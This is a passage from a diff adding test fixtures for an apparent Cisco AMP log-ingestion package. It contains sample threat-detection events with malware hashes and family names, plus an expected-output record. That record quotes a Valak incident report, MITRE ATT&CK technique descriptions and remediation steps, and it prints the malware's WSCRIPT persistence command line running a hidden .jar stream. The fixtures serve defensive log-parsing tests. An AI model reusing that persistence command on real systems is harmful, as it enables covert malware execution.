Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json
new file mode 100644
index 00000000000..a4bddd0ecca
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json
@@ -0,0 +1,3840 @@ +{ + "expected": [ + { + "@timestamp": "2021-01-15T11:59:52.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Threat_Hunting" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Threat_Hunting", + "hostname": "Demo_Threat_Hunting" + }, + "event": { + "severity": 4, + "action": "SecureX Threat Hunting Incident", + "ingested": "2021-09-12T17:31:04.469612451Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. 
Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. 
Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). 
Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. 
Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. 
(Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. 
Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. 
These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are 